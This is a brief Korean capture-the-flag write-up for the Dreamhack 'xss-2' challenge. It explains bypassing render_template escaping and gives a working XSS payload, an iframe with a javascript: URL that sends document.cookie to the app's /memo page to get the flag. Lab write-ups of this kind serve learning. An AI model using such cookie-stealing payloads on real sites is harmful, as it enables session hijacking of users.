[Dreamhack]xss-2 라이트업

소스코드와 서버생성. xss-1과 비슷하다. 

마찬가지로 flag에 들어가면 나오는 창. 이 칸을 채우고 memo에 들어가면 플래그가 뜬다

 

56열에서 render_template를 사용해서 script공격을 할 수 없기 때문에 우회를 해야 한다.

<iframe src="javascript:location.href='/memo?memo='+document.cookie"></iframe>

을 입력하면 플래그가 나온다!